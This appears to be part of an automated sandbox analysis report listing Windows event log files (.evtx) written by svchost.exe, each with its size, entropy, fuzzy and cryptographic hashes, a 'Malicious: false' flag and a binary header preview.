SHA-256:	0B62FDD9A57B1809D79561AE64BE30DD7430815D6954A5E3DF90E29E1B2E6C72
SHA-512:	2F5CC514B180A39E5961452A594FE5384A6369CBCB7A1CEBAC37948770A6CB999A2E2F26A32240058D5D7A335904DAF40C88F1C096D8F85907F23E9B32E79ABE
Malicious:	false
Preview:	ElfChnk.........$...............$.....................w.........................................................................................>.......................f...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...................................................V...................................**................o...............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Shell-Core%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	70808
Entropy (8bit):	4.499513578020981
Encrypted:	false
SSDEEP:	1536:xAoP9+xsgZi1XcRFkL1TWX0gkB/J7oasEfyk2/vKlqRi/PgTZSXwyvy8fJpfrAWl:xAoP8xsgZi1XcRFkL1TWX0gkB/J7oasW
MD5:	BC10D6D62B90B1D14E5E4388835CB495
SHA1:	0E58368171408695F4050FF04DA21A9F4CFF1BDB
SHA-256:	5573104124A4D0D76C40E381183DE85569C14D0DA44F7384F194BD2B4E4F2F12
SHA-512:	0EDB944E749399D3B6B834D9C438AB553D0AE4EC43CD20CED7D33FB78D422A926A2FEEE24C959124B54061C567DC1BA0C3C6ABA4DACDFE614779E751F5EAEE35
Malicious:	false
Preview:	ElfChnk.>...............>...........................I.>:.....................................................................E.T................0.......................X...=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................A...............&...i.......~........................x............................&...............................................................8.......P.....!....nqm......... .........&O......'O.....................................$.N......M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.S.h.e.l.l.-.C.o.r.e..n30'.\|D..Q.R.a.M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.S.h.e.l.l.-.C.o.r.e./.O.p.e.r.a.t.i.o.n.a.l......L.~.........n30'x.....(............x...............&...............................................................8.......P.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-ShellCommon-StartLayoutPopulation%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	66976
Entropy (8bit):	4.477181925275402
Encrypted:	false
SSDEEP:	384:E7Y7ohN7s7o787l7r787a7J7z7+7N17g7d7Y7g7gY7hZ7D7k7F7r7wm7NP7Y7+7I:M97uCg
MD5:	FBD04DC07D03AA33DD161EDCD79EEBB2
SHA1:	24E531688AB034EF77086879222202CD3BBF0EF5
SHA-256:	5C1A628B639346A80CABA7F8321C89F6F22106102ABF5E7184421A5E67477FF4
SHA-512:	8A6604FDF680757E759661A1585C42AF93099AAB1C26D7A8CFBC1228A3F49ABFAE05BEDB17DA7BA893FC07F875629113D6F2319808F19B3E21639A8061B11BC8
Malicious:	false
Preview:	ElfChnk.Y.......g.......Y.......g............%...&.._5......................................................................................................................=...........................................................................................................................f...............?...........................m...................M...F...........................................=...............&...............................................................s.............................f.......B.z...............................................................................f.......~.....!.....z..........@B.z.......&O......'O....x.......f........................$.N......M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.S.h.e.l.l.C.o.m.m.o.n.-.S.t.a.r.t.L.a.y.o.u.t.P.o.p.u.l.a.t.i.o.n.B.....K..p...1.M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.S.h.e.l.l.C.o.m.m.o.n.-.S.t.a.r.t.L.a.y.o.u.t.P.o.p.u.l.a.t.i.o.n./.O.p.e.r.a.t.i.o.n.a.l......Ls....................g.......4u......

C:\Windows\System32\winevt\Logs\Microsoft-Windows-SmbClient%4Connectivity.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	2.1499045494600955
Encrypted:	false
SSDEEP:	384:Dhc+uaNuru+uhuKVuPJu5u9u4ufuTuxuDuvuDuOuXumui+udutui4uTAuFuauind:D6Ovc0S5UyEeDgLslstY
MD5:	2045FB0D54CA8F456B545859B9F9B0A8
SHA1:	35854F87588C367DE32A3931E01BC71535E3F400
SHA-256:	E4305D5E1125E185F25AABA6FF9E32DE70B4EFD7264FE5A0C7C2EF3C33989C45
SHA-512:	013CAC4CBF67C9AB5D2A07E771BAF81950E5A256F379E3C2E26CC9E8E47379579470CC6FD56E93B31C4D17935713D1FC6026307427D77CBE9647139E3D73AC47
Malicious:	false
Preview:	ElfChnk.........;...............;...........xk...m...+.....................................................................F.~.................,.......................T...=...........................................................................................................................f...............?...........................m...................M...F...........................&...................................................................................6f..w...............................**...............&3..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-SmbClient%4Security.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.8164696340947971
Encrypted:	false
SSDEEP:	384:jhGuZumutu4uEu5uOuDuyb2uPu1uRu3uGuHu9/u:jr
MD5:	1AB19FA472669F4334C7A9D44E94E1B3
SHA1:	F71C16706CFA9930045C9A888FDB3EF46CACC5BC
SHA-256:	549D89A256E3C71AFCBF551EC9BEDBDB3CF2DC74B4F8C214FDC1D270FB731F6E
SHA-512:	72F1F20CB1F2984B318E4A2AAEE11D573441A77D04C0577D24E19F89E85F1691CB29EF569BD25EBBBD313C7B9DB945DB43D52EEFC2EF33E7BEECDFB8E0BBC404
Malicious:	false
Preview:	ElfChnk...................................... ..x$../..........................................................................<................$.......................L...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&....................................................!..................................**..............Wy.8..............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-StateRepository%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9855903635327656
Encrypted:	false
SSDEEP:	384:cxNhPALAb/A0D6AKAlAfyVAQhAQueA4AIAwA0AYAwA+/AfAjrA3DA:cxN90yzXd
MD5:	7BCA54AC75C7185ADFBB42B1A84F86E3
SHA1:	AD91EE55A6F9F77AD871ACA9A5B59987CA679968
SHA-256:	A43B1365211A968B4EC3F9EC7489D05AD9EED30D3EE0CCD89860D20DFE1914D4
SHA-512:	79A04DCE951528E09F7580E797E38D58CFC556EFEC032C3E68C701D720E01CBDCA3D4F27C309D50B9096570787A0E62B2C69236D148AC9C216CB13AA05E9619F
Malicious:	false
Preview:	ElfChnk.....................................P+...,...0........................................................................9.................B.......................j...=...........................................................................................................................f...............?...........................m...................M...F...........................U.......................%%......&...................................................>...........................E.......**..............o.m...............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Storage-Storport%4Health.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	3.165454452307923
Encrypted:	false
SSDEEP:	384:ghVpIcpBUpBxpBapB3pBEpBZpBKpBV1pBApBppBTSpBcu1pBspBlpBABpB7pB0py:gd+uXvB
MD5:	B6B6F199DA64422984403D7374F32528
SHA1:	980D66401DFCCF96ADDDAF22334A5CE735554E7F
SHA-256:	8F65F81EE28F48B5007E04842ACC9DE20794A59E2759C2F35F7C10730A1EF7BF
SHA-512:	5B0EFBF1C57BACF347790EB5915AFCFDDDDAFA7761D94DF1341C4E79F5B16DA3FAC2C9653C3DC41B80E31EA44AE46F4FC95C6EC0FFA0A0D3C05C69CED6955DE4
Malicious:	false
Preview:	ElfChnk.........'...............'...........P.......H:Z.....................................................................gO.................. .......................H...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&....................................................f..................................**..............m.................&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Storage-Storport%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	3.8519554794255333
Encrypted:	false
SSDEEP:	384:WhtbpwV1pIvpLfpvQpw2pQYph15pcApLqBpJxTp0qo8psfp4yp4Rphe3p7PpLWBZ:WwDoh1VqKVvcVU
MD5:	4140628CA3CEC29C0B506CEEBDF684F6
SHA1:	A2B70496C8E91D8E78AA04976B25D850ABAC6E1C
SHA-256:	1823149759A2F1771ACE7B6BE14A0FEFC6F93DD9F81AC1024E6B41C2CCBFD8B0
SHA-512:	779A04771A8E9B2F501FE1251F0D56C5B5988911F6067082D84FF1DBCF5D9281E32DF6CC2C995843EA1FCED748548DC116706E0F738B6510B47C2B3A0EBAA126
Malicious:	false
Preview:	ElfChnk.\...............\.......................0..../........................................................................v.......................................R...=...........................................................................................................................f...............?...........................m...................M...F............................................;..............&...................................i...................................mS..............*..8...\........=..............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-StorageSpaces-Driver%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.1642919553794224
Encrypted:	false
SSDEEP:	384:bhwCCRzCaCkClCzCYC/CyCVCGCMCvCNCACCxC/CLCoiC:bKFb
MD5:	D7EECF043241FDB9486580582E208603
SHA1:	045D5672A8E9884B78CD31C52D372375503CBF4F
SHA-256:	6F3BE76FC00FE21C18A904058F2AF850204488187187C9B8C4BF11EAA03EC6C0
SHA-512:	6738CD1D4081AD78CCC1E3E7AC46A394D9AC32906B4688E34DCCBBA42153FB826484C854F42FFF619DC8D50CAE708585B422F3EAA3A0219AAD19DC0962910125
Malicious:	false
Preview:	ElfChnk.....................................02..h6...u'.....................................................................1..................V.......................~...=...........................................................................................................................f...............?...........................m...................M...F...........................&...................................................................................V2............................../...**..p............................&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Store%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	83616
Entropy (8bit):	4.582831421581963
Encrypted:	false
SSDEEP:	768:1uDIZi8Ns5iLV8gRai8ZijiTEOmGkoeiDpbiE:T+Jao7mce8pP
MD5:	D1DEEB543797B5593601E7E484D510D9
SHA1:	339260952CECAA5533A104AFD555AEC8E5E68998
SHA-256:	4A595EA63B1D5DFD2222FD0E7B3147A6665C32F2DAEBA902583105A4A4B2580B
SHA-512:	4F6BD4AD330295D5E7F50C42078E2874115C3BB988F9D13BCE8BF37665633DCEB07D8F58A0087A0652EED16BB521C5064B272EE32B30B64E82986101F28C22B4
Malicious:	false
Preview:	ElfChnk.........................................h ...........................................................................Q..........................................4...=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................................&...................................**..0...........c4k...............&............"3WI..L..........A..\|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Storsvc%4Diagnostic.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	MS Windows Vista Event Log, 1 chunks (no. 0 in use), next record no. 15, DIRTY
Category:	dropped
Size (bytes):	79016
Entropy (8bit):	1.8195973326963628
Encrypted:	false
SSDEEP:	384:y6hL6UsE0ZUmxUmgDUmSUmKUmgUmlUmB8UmCUmeUmNUmtUmxUmXcUmYhL6UsE0ZZ:JY7LG5Y7LG
MD5:	27689044C17827F377D9272DE60F385E
SHA1:	F2F1AD0E97CDF652DDD113D075026E0235F61D3C
SHA-256:	2A6658A95CB5DB69D5ECEFEC6EF8A9D216E5A5C98DFD3CE41F3366ACC7516298
SHA-512:	0D4B703DA308D33B50E2D9B0EDCE7290F7633DF05FC99623FDDDC5CE6EB6D472A8CD2FCC696FC81C2A187CF2A08AC7544CF7C8BC3F45540FE1554FF74D9E354D
Malicious:	false
Preview:	ElfFile.....................................................................................................................\>.eElfChnk....................................../..(4...}}.....................................................................>ld................. .......................H...=...........................................................................................................................f...............?...........................m...................M...F...........................&..................................................................................../..................................**..............a...............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d.

C:\Windows\System32\winevt\Logs\Microsoft-Windows-TZUtil%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	67776
Entropy (8bit):	0.36733085249681147
Encrypted:	false
SSDEEP:	96:K5KNVaO80oIdW/6Fg55KNVaO80oIdW/6Fg:K58V7giFg558V7giFg
MD5:	91374FAFBCE65CC199141B9E828F43F4
SHA1:	9A6658CF416BC5B79191DE3501DF34D13F460307
SHA-256:	9C657F7E1A2A352629E5C0DEC63D2EC7827EA13446BAFF70E16C0D5B07465DDD
SHA-512:	9C40A768C2FCAC2809165B5526D287FC4742206E557F47A78CE84EE208597910473B8208FF983CB8FEC70AEDAFC3E212028BD131BEFD63AF052B962192849960
Malicious:	false
Preview:	ElfChnk................................................F.......................................................................2................ .......................H...=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................................&...................................**...............&f...............&............"3WI..L..........A..\|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.6469884746870727
Encrypted:	false
SSDEEP:	384:/hpivNiGiriPiYiriDfiS83i0iGiTiYiUisiuiZi+iTiciUiQiJiUiBi4i/iAixQ:/G7t8H
MD5:	FC81D9FBA555C6BC7223594B8F6B46DE
SHA1:	971F47CFC0E1DCA462928DA2D8BE2B16D5A0629C
SHA-256:	9933922E09C49C5BA80292C4AED9EC9F457031E90B28B421DFFBD2F1BB840671
SHA-512:	7F2705E7526B49F76C5F2A76A88B83FC10591BAD68B451F5C67F841322076D4B408FC515EA59E0919907C73CBBD149AB5B5EE981083A52C9E90EC9FBFAD5254F
Malicious:	false
Preview:	ElfChnk.y...............y................... Q..(S...b.......................................................................t..............................................=.......................#...................................................................................................f...............?.......................P.......................M...F...............................................................................................................VG..................................**......y..........:............g.&.........g....R....uJ.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	3.408089844366563
Encrypted:	false
SSDEEP:	768:ila0Nva3aXaraLaDaraPajaza/a3aba3araPa9pafaDa7aTa7aTa7arababaLaz6:qN
MD5:	CBD26A0BFB1B17BC56759F9B16C969FB
SHA1:	A5830EC36FF48806E2C2FDA2346EA4F6E6B7C77E
SHA-256:	A5621C687F79A765371D1EE90DAA61DE6DC0A9520AC9011E48BF39D70841964A
SHA-512:	28F841B8DFBC129E1D5B34630A174A456FAA92004249423BDAF25EB946FC72A1BD24691964C81179A2E1D1FCA7885192A5476BE3CDE3818BC9D57F2A568AC809
Malicious:	false
Preview:	ElfChnk.........@...............@...............`...4_.2.....................................................................+.\|................`...........................=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................................9...................................**..H...........1.I...............&............"3WI..L..........A..\|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-User Device Registration%4Admin.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.3132453844344478
Encrypted:	false
SSDEEP:	384:hhaXJb4+XJcXJsXJrXJQXJIXJdXJkXJuXJyXJLMXJnXJRXJtXJLXJjXJppXJ:hQ0yUkNYwD8imLE5nTtFpf
MD5:	6237EE0458A0478242B975E9BB7AA97D
SHA1:	6B0BDBA887DA21675A63FC73AED995B1BCA3F6B1
SHA-256:	C8E224C54278C206302EAD7011ACC48CAC60E7638E32EE70653190DBC90FA70A
SHA-512:	56C025C971F77AB8E911E0190E8AB5CF533A909C1BF4558876FB2761AAA381CB7D21E44A3273FA4427CB2FF7DEECC15A312DD2A424B96ABDC4886BDF233F30E9
Malicious:	false
Preview:	ElfChnk......................................<...A.........................................................................i,.q................j...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................................&....................................................<......C...........................**..............@V.$..............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-User Profile Service%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.325262033408211
Encrypted:	false
SSDEEP:	384:6hYmn9moomUmKBmZOmZmlmmmomRmemtmsmimGmHmEmqmwmHmLmlm9mGmdmpm3mfO:6/fGTDcx
MD5:	D13189B45679E53F5744A4D449F8B00F
SHA1:	ED410CAB42772E329F656B4793B46AC7159CF05B
SHA-256:	BAA80D6A7DC42752766B1862A00009A1D76B57022A4D5A89692DBA2D6866EBA1
SHA-512:	83399CE082F8C6D2917B8363E053C770F2783B3D086F39736919FBFA533DF65993A3B7840A2E1000B08948584CF9750C27961BF8A7BE3A235B5DDD779616013F
Malicious:	false
Preview:	ElfChnk.....................................h.................................................................................-.................X...........................=...........................................................................................................................f...............?...........................m...................M...F...............................................1...........&.......................................................................................**..x...........~_g...............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.7947046118743749
Encrypted:	false
SSDEEP:	384:jhr2zS2o202AW2D2t2l292l2V2p2d2N2:j8Q
MD5:	55E73A924B170FBFFF862E8E195E839A
SHA1:	3C625D05DFC08AE9DF26AEBAA82D72FC9F28ADB0
SHA-256:	1B36D85AA56A023F6646D6EF28C9DCB5358528274EDCC9B6ED20705E3007E8A2
SHA-512:	E14D32569F37A827EDBD1F02667866431C856D087A396933DE5E9B87943369C4802D220557050C7B0FE9367FBD0683676776E6D3CCBCB290C9F30D86EC529E28
Malicious:	false
Preview:	ElfChnk...................................... ..X"...........................................................................?.................Z...........................=...........................................................................................................................f...............?...........................m...................M...F...............................3...........................&.......................................................................................**................................&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-WMI-Activity%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	132560
Entropy (8bit):	4.370455907012503
Encrypted:	false
SSDEEP:	384:LjRzRuRnxhSRumRtRqR5RVR+rRvR3RFRXRmRbR+RLRlRFRDRiwhR3KR31RIRB8Rd:L6xA8nPLGbkZxA8nPLGbS
MD5:	E6ABB66EF952A2C26E0AB66E4E3E35FF
SHA1:	761DAFD03BF6DCE6C1F3C9AC9FFFDC85ECB58883
SHA-256:	4381ABB52467795F4B0F18797EB03B4A7C6FEEF0C2CCA650BD3BD887D9AE68FA
SHA-512:	BB5F01D8240562E7B1BF22B38A674515193C7A52DB9CB75057ECAD03E204B22CEB97FC824CDBE6E74C4044413EE571AB0C2ACCE2B91EFF9F0C8DCF9FC7F91278
Malicious:	false
Preview:	ElfChnk.....................................@...X............................................................................y.......................y.......x..N...........=............................................y..................}y..3...........................................c......xb..f...h.......lc..?.......................h........c......M.......M...F...9c..............................................Qb..............................................A.......i.......................&............x..*...............Y;............x68................................................................<.......T...-.!................@.Y;....../q.2.E..y.9..LP...t........................M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.W.M.I.-.A.c.t.i.v.i.t.y.......#F.~.J.{..M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.W.M.I.-.A.c.t.i.v.i.t.y./.O.p.e.r.a.t.i.o.n.a.l......Qb.........................P.r.o.t.e.c.t.i.o.n.M.a.n.a.g.e.m.e.n.t.......w.m.i.p.r.v.s.e...e.x.e...P...".%.P.r.o.g.r.a.m.D.a.t.a.%.\.M.i.c

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Wcmsvc%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.273338343434408
Encrypted:	false
SSDEEP:	384:mhWhjhUh4h4hthXhzh8cghshqh9hihXhMhxhzhwhohGh5h3hShChWhzhLhahYhC1:mBsFpkBjOFK
MD5:	C37372EB51AEDB4552CB839C7294403A
SHA1:	7B7C408D72B084CE36AA6B623AC6B907FD21D569
SHA-256:	C3B5D9D16F88507EF69A9B6FF8581AEBAFF84D254F62CD4E75B6A9C6F93E93C4
SHA-512:	69183719C29FCE5CEDB2634579ABA9FEF835A3CDC7668BB741F9DB36050756C088FD331E898DA8E4850887FD217B939DF1C5A3E7D73D2260CB3AC3570E71718E
Malicious:	false
Preview:	ElfChnk....................................................................................................................x...........................................8...=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................................&...................................**..............i.T..............&............"3WI..L..........A..\|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-WebAuthN%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.231195890775603
Encrypted:	false
SSDEEP:	384:ZhOVPiVcVCVC7VNVtVEV3Vob7V5VXVmVbVoV/VEVptVtVBVnVOVt9VjViVyVKVui:Zyjbn
MD5:	3365A34953FD7B16667108A049B64DA5
SHA1:	C72421A58E063D64072152344B266F8306A78702
SHA-256:	AAEDFFE84B66B602858AF51D5B2EBA7CFC9DB57A4A3DD3240DB44B737B9BBF26
SHA-512:	A5569EDC7516DACCCE7B3135114588E01ED1A77CA95B0F378E389E27AC8999EA71E8AF36FD275EEA7E81987CB9BF14910645DE3DC4FE8E086FF532796DD78AAF
Malicious:	false
